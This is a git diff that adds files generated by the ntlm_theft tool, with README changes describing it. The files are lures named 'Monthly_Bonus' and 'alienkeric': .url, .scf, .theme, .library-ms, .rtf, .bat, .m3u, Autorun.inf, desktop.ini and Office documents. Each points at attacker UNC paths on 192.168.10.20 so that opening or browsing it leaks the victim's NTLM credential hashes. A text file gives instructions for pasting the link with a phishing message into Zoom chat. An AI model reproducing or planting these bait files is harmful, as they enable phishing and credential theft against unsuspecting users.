diff --git a/Monthly_Bonus/Autorun.inf b/Monthly_Bonus/Autorun.inf new file mode 100644 index 0000000..eabb8f1 --- /dev/null +++ b/Monthly_Bonus/Autorun.inf @@ -0,0 +1,4 @@ +[autorun] +open=\\192.168.10.20\setup.exe +icon=something.ico +action=open Setup.exe \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus-(externalcell).xlsx b/Monthly_Bonus/Monthly_Bonus-(externalcell).xlsx new file mode 100644 index 0000000..d6f5b2e Binary files /dev/null and b/Monthly_Bonus/Monthly_Bonus-(externalcell).xlsx differ diff --git a/Monthly_Bonus/Monthly_Bonus-(frameset).docx b/Monthly_Bonus/Monthly_Bonus-(frameset).docx new file mode 100644 index 0000000..d9ea1d6 Binary files /dev/null and b/Monthly_Bonus/Monthly_Bonus-(frameset).docx differ diff --git a/Monthly_Bonus/Monthly_Bonus-(fulldocx).xml b/Monthly_Bonus/Monthly_Bonus-(fulldocx).xml new file mode 100644 index 0000000..c495041 --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus-(fulldocx).xml @@ -0,0 +1,916 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + ntlm_theft + + + ntlm_theft + 1 + 2020-03-23T01:21:00Z + 2020-03-23T01:24:00Z + + + + + + + + 3 + 1 + 9 + 57 + Microsoft Office Word + 0 + 1 + 1 + false + + false + 65 + false + false + 16.0000 + + + + \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus-(handler).htm b/Monthly_Bonus/Monthly_Bonus-(handler).htm new file mode 100644 index 0000000..cf306c6 --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus-(handler).htm @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus-(icon).url b/Monthly_Bonus/Monthly_Bonus-(icon).url new file mode 100644 index 0000000..51452c0 --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus-(icon).url @@ -0,0 +1,5 @@ +[InternetShortcut] +URL=whatever +WorkingDirectory=whatever +IconFile=\\192.168.10.20\%USERNAME%.icon +IconIndex=1 \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus-(includepicture).docx b/Monthly_Bonus/Monthly_Bonus-(includepicture).docx new file mode 100644 index 0000000..38a6ced Binary files /dev/null and b/Monthly_Bonus/Monthly_Bonus-(includepicture).docx differ diff --git a/Monthly_Bonus/Monthly_Bonus-(remotetemplate).docx b/Monthly_Bonus/Monthly_Bonus-(remotetemplate).docx new file mode 100644 index 0000000..bad84c9 Binary files /dev/null and b/Monthly_Bonus/Monthly_Bonus-(remotetemplate).docx differ diff --git a/Monthly_Bonus/Monthly_Bonus-(stylesheet).xml b/Monthly_Bonus/Monthly_Bonus-(stylesheet).xml new file mode 100644 index 0000000..c2d8221 --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus-(stylesheet).xml @@ -0,0 +1,3 @@ + + + \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus-(url).url b/Monthly_Bonus/Monthly_Bonus-(url).url new file mode 100644 index 0000000..8ff84aa --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus-(url).url @@ -0,0 +1,2 @@ +[InternetShortcut] +URL=file://192.168.10.20/leak/leak.html \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus.application b/Monthly_Bonus/Monthly_Bonus.application new file mode 100644 index 0000000..7c87de4 --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus.application @@ -0,0 +1,18 @@ + + +    +    +    +    +       +          +          +             +                +             +             +            ESZ11736AFIJnp6lKpFYCgjw4dU= +          +       +    + \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus.asx b/Monthly_Bonus/Monthly_Bonus.asx new file mode 100644 index 0000000..b9f2c8a --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus.asx @@ -0,0 +1,7 @@ + + Leak + + + + + \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus.bat b/Monthly_Bonus/Monthly_Bonus.bat new file mode 100644 index 0000000..0d5432f --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus.bat @@ -0,0 +1,2 @@ +@echo off +start "" "\\192.168.10.20\share" diff --git a/Monthly_Bonus/Monthly_Bonus.htm b/Monthly_Bonus/Monthly_Bonus.htm new file mode 100644 index 0000000..266013e --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus.htm @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus.jnlp b/Monthly_Bonus/Monthly_Bonus.jnlp new file mode 100644 index 0000000..5e21a92 --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus.jnlp @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus.library-ms b/Monthly_Bonus/Monthly_Bonus.library-ms new file mode 100644 index 0000000..58b2545 --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus.library-ms @@ -0,0 +1,29 @@ + + +@shell32.dll,-34575 +S-1-5-21-372074477-2495183225-776587326-1000 +1 +true +\\192.168.10.20\aa + +{7d49d726-3c21-4f05-99aa-fdc2c9474656} + + + +@shell32.dll,-34577 +true + +knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7} +MBAAAEAFCAAA...MFNVAAAAAA + + + +@shell32.dll,-34579 +true + +knownfolder:{ED4824AF-DCE4-45A8-81E2-FC7965083634} +MBAAAEAFCAAA...HJIfK9AAAAAA + + + + \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus.lnk b/Monthly_Bonus/Monthly_Bonus.lnk new file mode 100644 index 0000000..0426a56 Binary files /dev/null and b/Monthly_Bonus/Monthly_Bonus.lnk differ diff --git a/Monthly_Bonus/Monthly_Bonus.m3u b/Monthly_Bonus/Monthly_Bonus.m3u new file mode 100644 index 0000000..ca03449 --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus.m3u @@ -0,0 +1,3 @@ +#EXTM3U +#EXTINF:1337, Leak +\\192.168.10.20\leak.mp3 \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus.odt b/Monthly_Bonus/Monthly_Bonus.odt new file mode 100644 index 0000000..af928a8 Binary files /dev/null and b/Monthly_Bonus/Monthly_Bonus.odt differ diff --git a/Monthly_Bonus/Monthly_Bonus.pdf b/Monthly_Bonus/Monthly_Bonus.pdf new file mode 100644 index 0000000..808eca5 Binary files /dev/null and b/Monthly_Bonus/Monthly_Bonus.pdf differ diff --git a/Monthly_Bonus/Monthly_Bonus.rtf b/Monthly_Bonus/Monthly_Bonus.rtf new file mode 100644 index 0000000..1830afe --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus.rtf @@ -0,0 +1 @@ +{\rtf1{\field{\*\fldinst {INCLUDEPICTURE "file://192.168.10.20/test.jpg" \\* MERGEFORMAT\\d}}{\fldrslt}}} \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus.scf b/Monthly_Bonus/Monthly_Bonus.scf new file mode 100644 index 0000000..f33b3cb --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus.scf @@ -0,0 +1,5 @@ +[Shell] +Command=2 +IconFile=\\192.168.10.20\tools\nc.ico +[Taskbar] +Command=ToggleDesktop \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus.theme b/Monthly_Bonus/Monthly_Bonus.theme new file mode 100644 index 0000000..b25c65c --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus.theme @@ -0,0 +1,66 @@ +[Theme] +; Windows - IDS_THEME_DISPLAYNAME_AERO_LIGHT +DisplayName=\192.168.10.20 Theme +SetLogonBackground=0 +; Computer - SHIDI_SERVER +[CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon] +DefaultValue=\\192.168.10.20\setup.exe,-109 + +; UsersFiles - SHIDI_USERFILES +[CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\DefaultIcon] +DefaultValue=\\192.168.10.20\setup.exe,-123 + +; Network - SHIDI_MYNETWORK +[CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\DefaultIcon] +DefaultValue=\\192.168.10.20\setup.exe,-25 + +; Recycle Bin - SHIDI_RECYCLERFULL SHIDI_RECYCLER +[CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon] +Full=\\192.168.10.20\setup.exe,-54 +Empty=\\192.168.10.20\setup.exe,-55 + +[Control Panel\Cursors] +AppStarting=\\192.168.10.20\setup.exe +Arrow=\\192.168.10.20\aero_arrow.cur +Crosshair= +Hand=\\192.168.10.20\aero_link.cur +Help=\\192.168.10.20\aero_helpsel.cur +IBeam= +No=\\192.168.10.20\aero_unavail.cur +NWPen=\\192.168.10.20\aero_pen.cur +SizeAll=\\192.168.10.20\aero_move.cur +SizeNESW=\\192.168.10.20\aero_nesw.cur +SizeNS=\\192.168.10.20\aero_ns.cur +SizeNWSE=\\192.168.10.20\aero_nwse.cur +SizeWE=\\192.168.10.20\aero_ew.cur +UpArrow=\\192.168.10.20\aero_up.cur +Wait=\\192.168.10.20\aero_busy.ani +DefaultValue=Windows Default +DefaultValue.MUI=@main.cpl,-1020 + +[Control Panel\Desktop] +Wallpaper=\\192.168.10.20\setup.exe +TileWallpaper=0 +WallpaperStyle=10 +Pattern= +MultimonBackgrounds=0 + +[VisualStyles] +Path=\\192.168.10.20\Themes\Aero\Aero.msstyles +ColorStyle=NormalColor +Size=NormalSize +AutoColorization=0 +ColorizationColor=0XC40078D4 +SystemMode=Light +AppMode=Light + +[boot] +SCRNSAVE.EXE= + +[MasterThemeSelector] +MTSM=RJSPBS + +[Sounds] +; IDS_SCHEME_DEFAULT +SchemeName=@\\192.168.10.20\setup.dll,-800 + \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus.wax b/Monthly_Bonus/Monthly_Bonus.wax new file mode 100644 index 0000000..c2e8948 --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus.wax @@ -0,0 +1,2 @@ +https://192.168.10.20/test +file://\\192.168.10.20/steal/file \ No newline at end of file diff --git a/Monthly_Bonus/Monthly_Bonus.website b/Monthly_Bonus/Monthly_Bonus.website new file mode 100644 index 0000000..55762c1 --- /dev/null +++ b/Monthly_Bonus/Monthly_Bonus.website @@ -0,0 +1,12 @@ +[{000214A0-0000-0000-C000-000000000046}] +Prop3=19,2 +Prop4=31,go.microsoft.com +[InternetShortcut] +URL=file:///192.168.10.20/ +[{A7AF692E-098D-4C08-A225-D433CA835ED0}] +Prop5=3,0 +Prop9=19,0 +Prop2=65,2C0000000000000001000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF310000002B000000710600006204000056 +Prop6=3,1 +[{9F4C2855-9F79-4B39-A8D0-E1D42DE1D5F3}] +Prop5=8,Microsoft.Website.B4BD2547.99055A5E \ No newline at end of file diff --git a/Monthly_Bonus/desktop.ini b/Monthly_Bonus/desktop.ini new file mode 100644 index 0000000..143dd6b --- /dev/null +++ b/Monthly_Bonus/desktop.ini @@ -0,0 +1,2 @@ +[.ShellClassInfo] +IconResource=\\192.168.10.20\aa \ No newline at end of file diff --git a/Monthly_Bonus/zoom-attack-instructions.txt b/Monthly_Bonus/zoom-attack-instructions.txt new file mode 100644 index 0000000..4833f2e --- /dev/null +++ b/Monthly_Bonus/zoom-attack-instructions.txt @@ -0,0 +1,3 @@ +To attack zoom, just put the following link along with your phishing message in the chat window: + +\\192.168.10.20\xyz diff --git a/README.md b/README.md index 7d27b3a..6ef5e35 100644 --- a/README.md +++ b/README.md @@ -15,6 +15,7 @@ ntlm_theft supports the following attack types: * .scf – via ICONFILE field (Not Working on Latest Windows) * autorun.inf via OPEN field (Not Working on Latest Windows) * desktop.ini - via IconResource field (Not Working on Latest Windows) + * .bat – delivered via the URL field or execute via cmd.exe. * Open Document * .xml – via Microsoft Word external stylesheet * .xml – via Microsoft Word includepicture field @@ -28,10 +29,12 @@ ntlm_theft supports the following attack types: * .m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy) * .jnlp – via Java external jar * .application – via any Browser (Must be served via a browser downloaded or won’t run) + * .odt – via LibreOffice / OpenOffice * Open Document and Accept Popup * .pdf – via Adobe Acrobat Reader * Click Link in Chat Program * .txt – formatted link to paste into Zoom chat + ## Usecases (Why you want to run this) @@ -49,7 +52,7 @@ These instructions will show you the requirements for and how to use ntlm_theft. ntlm_theft requires Python3 and xlsxwriter: ``` -pip3 install xlsxwriter +pip3 install -r requirements.txt ``` ### Required Parameters @@ -67,23 +70,34 @@ To start up the tool 4 parameters must be provided, an input format, the input f Here is an example of what a run looks like generating all files: ``` -# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test -Created: test/test.scf (BROWSE) -Created: test/test-(url).url (BROWSE) -Created: test/test-(icon).url (BROWSE) -Created: test/test.rtf (OPEN) -Created: test/test-(stylesheet).xml (OPEN) -Created: test/test-(fulldocx).xml (OPEN) -Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) -Created: test/test-(includepicture).docx (OPEN) -Created: test/test-(remotetemplate).docx (OPEN) -Created: test/test-(frameset).docx (OPEN) -Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY) -Created: test/test.asx (OPEN) -Created: test/test.jnlp (OPEN) -Created: test/test.application (DOWNLOAD AND OPEN) -Created: test/test.pdf (OPEN AND ALLOW) -Created: test/zoom-attack-instructions.txt (PASTE TO CHAT) +# python3 ntlm_theft.py --generate all --server 192.168.10.20 --filename alienkeric +Created: alienkeric/alienkeric.scf (BROWSE TO FOLDER) +Created: alienkeric/alienkeric-(url).url (BROWSE TO FOLDER) +Created: alienkeric/alienkeric-(icon).url (BROWSE TO FOLDER) +Created: alienkeric/alienkeric.lnk (BROWSE TO FOLDER) +Created: alienkeric/alienkeric.rtf (OPEN) +Created: alienkeric/alienkeric-(stylesheet).xml (OPEN) +Created: alienkeric/alienkeric-(fulldocx).xml (OPEN) +Created: alienkeric/alienkeric.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) +Created: alienkeric/alienkeric-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) +Created: alienkeric/alienkeric-(includepicture).docx (OPEN) +Created: alienkeric/alienkeric-(remotetemplate).docx (OPEN) +Created: alienkeric/alienkeric-(frameset).docx (OPEN) +Created: alienkeric/alienkeric-(externalcell).xlsx (OPEN) +Created: alienkeric/alienkeric.wax (OPEN) +Created: alienkeric/alienkeric.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY) +Created: alienkeric/alienkeric.asx (OPEN) +Created: alienkeric/alienkeric.jnlp (OPEN) +Created: alienkeric/alienkeric.application (DOWNLOAD AND OPEN) +Created: alienkeric/alienkeric.pdf (OPEN AND ALLOW) +Created: alienkeric/zoom-attack-instructions.txt (PASTE TO CHAT) +Created: alienkeric/alienkeric.library-ms (BROWSE TO FOLDER) +Created: alienkeric/Autorun.inf (BROWSE TO FOLDER) +Created: alienkeric/desktop.ini (BROWSE TO FOLDER) +Created: alienkeric/alienkeric.theme (THEME TO INSTALL +Created: alienkeric/alienkeric.bat (BROWSE TO FOLDER) +Created: alienkeric/alienkeric.website (BROWSE TO FOLDER) +Created: alienkeric/alienkeric.odt (Open in LibreOffice / OpenOffice) Generation Complete. ``` @@ -93,39 +107,45 @@ Generation Complete. Here is an example of what a run looks like generating only modern files: ``` -# python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting -Skipping SCF as it does not work on modern Windows -Created: meeting/meeting-(url).url (BROWSE TO FOLDER) -Created: meeting/meeting-(icon).url (BROWSE TO FOLDER) -Created: meeting/meeting.rtf (OPEN) -Created: meeting/meeting-(stylesheet).xml (OPEN) -Created: meeting/meeting-(fulldocx).xml (OPEN) -Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) -Created: meeting/meeting-(includepicture).docx (OPEN) -Created: meeting/meeting-(remotetemplate).docx (OPEN) -Created: meeting/meeting-(frameset).docx (OPEN) -Created: meeting/meeting-(externalcell).xlsx (OPEN) -Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY) -Created: meeting/meeting.asx (OPEN) -Created: meeting/meeting.jnlp (OPEN) -Created: meeting/meeting.application (DOWNLOAD AND OPEN) -Created: meeting/meeting.pdf (OPEN AND ALLOW) +# python3 ntlm_theft.py --generate modern --server 192.168.10.20 --filename alienkeric +Created: alienkeric/alienkeric-(url).url (BROWSE TO FOLDER) +Created: alienkeric/alienkeric-(icon).url (BROWSE TO FOLDER) +Created: alienkeric/alienkeric.lnk (BROWSE TO FOLDER) +Created: alienkeric/alienkeric.rtf (OPEN) +Created: alienkeric/alienkeric-(stylesheet).xml (OPEN) +Created: alienkeric/alienkeric-(fulldocx).xml (OPEN) +Created: alienkeric/alienkeric.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) +Created: alienkeric/alienkeric-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) +Created: alienkeric/alienkeric-(includepicture).docx (OPEN) +Created: alienkeric/alienkeric-(remotetemplate).docx (OPEN) +Created: alienkeric/alienkeric-(frameset).docx (OPEN) +Created: alienkeric/alienkeric-(externalcell).xlsx (OPEN) +Created: alienkeric/alienkeric.wax (OPEN) +Created: alienkeric/alienkeric.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY) +Created: alienkeric/alienkeric.asx (OPEN) +Created: alienkeric/alienkeric.jnlp (OPEN) +Created: alienkeric/alienkeric.application (DOWNLOAD AND OPEN) +Created: alienkeric/alienkeric.pdf (OPEN AND ALLOW) Skipping zoom as it does not work on the latest versions +Created: alienkeric/alienkeric.library-ms (BROWSE TO FOLDER) Skipping Autorun.inf as it does not work on modern Windows Skipping desktop.ini as it does not work on modern Windows +Created: alienkeric/alienkeric.theme (THEME TO INSTALL +Created: alienkeric/alienkeric.bat (BROWSE TO FOLDER) +Created: alienkeric/alienkeric.website (BROWSE TO FOLDER) +Created: alienkeric/alienkeric.odt (Open in LibreOffice / OpenOffice) Generation Complete. ``` -Here is an example of what a run looks like generating only a xlsx file: +Here is an example of what a run looks like generating only a odt file: ``` -# python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4 -Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN) +# python3 ntlm_theft.py --generate odt --server 192.168.10.20 --filename alienkeric +Created: alienkeric/alienkeric.odt (Open in LibreOffice / OpenOffice) Generation Complete. ``` ## Authors - * **Jacob Wilkin** - *Research and Development* ## License diff --git a/alienkeric/Autorun.inf b/alienkeric/Autorun.inf new file mode 100644 index 0000000..eabb8f1 --- /dev/null +++ b/alienkeric/Autorun.inf @@ -0,0 +1,4 @@ +[autorun] +open=\\192.168.10.20\setup.exe +icon=something.ico +action=open Setup.exe \ No newline at end of file diff --git a/alienkeric/alienkeric-(externalcell).xlsx b/alienkeric/alienkeric-(externalcell).xlsx new file mode 100644 index 0000000..db14693 Binary files /dev/null and b/alienkeric/alienkeric-(externalcell).xlsx differ diff --git a/alienkeric/alienkeric-(frameset).docx b/alienkeric/alienkeric-(frameset).docx new file mode 100644 index 0000000..f5e55bc Binary files /dev/null and b/alienkeric/alienkeric-(frameset).docx differ diff --git a/alienkeric/alienkeric-(fulldocx).xml b/alienkeric/alienkeric-(fulldocx).xml new file mode 100644 index 0000000..c495041 --- /dev/null +++ b/alienkeric/alienkeric-(fulldocx).xml @@ -0,0 +1,916 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + ntlm_theft + + + ntlm_theft + 1 + 2020-03-23T01:21:00Z + 2020-03-23T01:24:00Z + + + + + + + + 3 + 1 + 9 + 57 + Microsoft Office Word + 0 + 1 + 1 + false + + false + 65 + false + false + 16.0000 + + + + \ No newline at end of file diff --git a/alienkeric/alienkeric-(handler).htm b/alienkeric/alienkeric-(handler).htm new file mode 100644 index 0000000..cf306c6 --- /dev/null +++ b/alienkeric/alienkeric-(handler).htm @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/alienkeric/alienkeric-(icon).url b/alienkeric/alienkeric-(icon).url new file mode 100644 index 0000000..51452c0 --- /dev/null +++ b/alienkeric/alienkeric-(icon).url @@ -0,0 +1,5 @@ +[InternetShortcut] +URL=whatever +WorkingDirectory=whatever +IconFile=\\192.168.10.20\%USERNAME%.icon +IconIndex=1 \ No newline at end of file diff --git a/alienkeric/alienkeric-(includepicture).docx b/alienkeric/alienkeric-(includepicture).docx new file mode 100644 index 0000000..d5c2a6a Binary files /dev/null and b/alienkeric/alienkeric-(includepicture).docx differ diff --git a/alienkeric/alienkeric-(remotetemplate).docx b/alienkeric/alienkeric-(remotetemplate).docx new file mode 100644 index 0000000..fb94650 Binary files /dev/null and b/alienkeric/alienkeric-(remotetemplate).docx differ diff --git a/alienkeric/alienkeric-(stylesheet).xml b/alienkeric/alienkeric-(stylesheet).xml new file mode 100644 index 0000000..c2d8221 --- /dev/null +++ b/alienkeric/alienkeric-(stylesheet).xml @@ -0,0 +1,3 @@ + + + \ No newline at end of file diff --git a/alienkeric/alienkeric-(url).url b/alienkeric/alienkeric-(url).url new file mode 100644 index 0000000..8ff84aa --- /dev/null +++ b/alienkeric/alienkeric-(url).url @@ -0,0 +1,2 @@ +[InternetShortcut] +URL=file://192.168.10.20/leak/leak.html \ No newline at end of file diff --git a/alienkeric/alienkeric.application b/alienkeric/alienkeric.application new file mode 100644 index 0000000..7c87de4 --- /dev/null +++ b/alienkeric/alienkeric.application @@ -0,0 +1,18 @@ + + +    +    +    +    +       +          +          +             +                +             +             +            ESZ11736AFIJnp6lKpFYCgjw4dU= +          +       +    + \ No newline at end of file diff --git a/alienkeric/alienkeric.asx b/alienkeric/alienkeric.asx new file mode 100644 index 0000000..b9f2c8a --- /dev/null +++ b/alienkeric/alienkeric.asx @@ -0,0 +1,7 @@ + + Leak + + + + + \ No newline at end of file diff --git a/alienkeric/alienkeric.bat b/alienkeric/alienkeric.bat new file mode 100644 index 0000000..0d5432f --- /dev/null +++ b/alienkeric/alienkeric.bat @@ -0,0 +1,2 @@ +@echo off +start "" "\\192.168.10.20\share" diff --git a/alienkeric/alienkeric.htm b/alienkeric/alienkeric.htm new file mode 100644 index 0000000..266013e --- /dev/null +++ b/alienkeric/alienkeric.htm @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/alienkeric/alienkeric.jnlp b/alienkeric/alienkeric.jnlp new file mode 100644 index 0000000..5e21a92 --- /dev/null +++ b/alienkeric/alienkeric.jnlp @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/alienkeric/alienkeric.library-ms b/alienkeric/alienkeric.library-ms new file mode 100644 index 0000000..58b2545 --- /dev/null +++ b/alienkeric/alienkeric.library-ms @@ -0,0 +1,29 @@ + + +@shell32.dll,-34575 +S-1-5-21-372074477-2495183225-776587326-1000 +1 +true +\\192.168.10.20\aa + +{7d49d726-3c21-4f05-99aa-fdc2c9474656} + + + +@shell32.dll,-34577 +true + +knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7} +MBAAAEAFCAAA...MFNVAAAAAA + + + +@shell32.dll,-34579 +true + +knownfolder:{ED4824AF-DCE4-45A8-81E2-FC7965083634} +MBAAAEAFCAAA...HJIfK9AAAAAA + + + + \ No newline at end of file diff --git a/alienkeric/alienkeric.lnk b/alienkeric/alienkeric.lnk new file mode 100644 index 0000000..0426a56 Binary files /dev/null and b/alienkeric/alienkeric.lnk differ diff --git a/alienkeric/alienkeric.m3u b/alienkeric/alienkeric.m3u new file mode 100644 index 0000000..ca03449 --- /dev/null +++ b/alienkeric/alienkeric.m3u @@ -0,0 +1,3 @@ +#EXTM3U +#EXTINF:1337, Leak +\\192.168.10.20\leak.mp3 \ No newline at end of file diff --git a/alienkeric/alienkeric.odt b/alienkeric/alienkeric.odt new file mode 100644 index 0000000..b35d373 Binary files /dev/null and b/alienkeric/alienkeric.odt differ diff --git a/alienkeric/alienkeric.pdf b/alienkeric/alienkeric.pdf new file mode 100644 index 0000000..808eca5 Binary files /dev/null and b/alienkeric/alienkeric.pdf differ diff --git a/alienkeric/alienkeric.rtf b/alienkeric/alienkeric.rtf new file mode 100644 index 0000000..1830afe --- /dev/null +++ b/alienkeric/alienkeric.rtf @@ -0,0 +1 @@ +{\rtf1{\field{\*\fldinst {INCLUDEPICTURE "file://192.168.10.20/test.jpg" \\* MERGEFORMAT\\d}}{\fldrslt}}} \ No newline at end of file diff --git a/alienkeric/alienkeric.scf b/alienkeric/alienkeric.scf new file mode 100644 index 0000000..f33b3cb --- /dev/null +++ b/alienkeric/alienkeric.scf @@ -0,0 +1,5 @@ +[Shell] +Command=2 +IconFile=\\192.168.10.20\tools\nc.ico +[Taskbar] +Command=ToggleDesktop \ No newline at end of file diff --git a/alienkeric/alienkeric.theme b/alienkeric/alienkeric.theme new file mode 100644 index 0000000..b25c65c --- /dev/null +++ b/alienkeric/alienkeric.theme @@ -0,0 +1,66 @@ +[Theme] +; Windows - IDS_THEME_DISPLAYNAME_AERO_LIGHT +DisplayName=\192.168.10.20 Theme +SetLogonBackground=0 +; Computer - SHIDI_SERVER +[CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon] +DefaultValue=\\192.168.10.20\setup.exe,-109 + +; UsersFiles - SHIDI_USERFILES +[CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\DefaultIcon] +DefaultValue=\\192.168.10.20\setup.exe,-123 + +; Network - SHIDI_MYNETWORK +[CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\DefaultIcon] +DefaultValue=\\192.168.10.20\setup.exe,-25 + +; Recycle Bin - SHIDI_RECYCLERFULL SHIDI_RECYCLER +[CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon] +Full=\\192.168.10.20\setup.exe,-54 +Empty=\\192.168.10.20\setup.exe,-55 + +[Control Panel\Cursors] +AppStarting=\\192.168.10.20\setup.exe +Arrow=\\192.168.10.20\aero_arrow.cur +Crosshair= +Hand=\\192.168.10.20\aero_link.cur +Help=\\192.168.10.20\aero_helpsel.cur +IBeam= +No=\\192.168.10.20\aero_unavail.cur +NWPen=\\192.168.10.20\aero_pen.cur 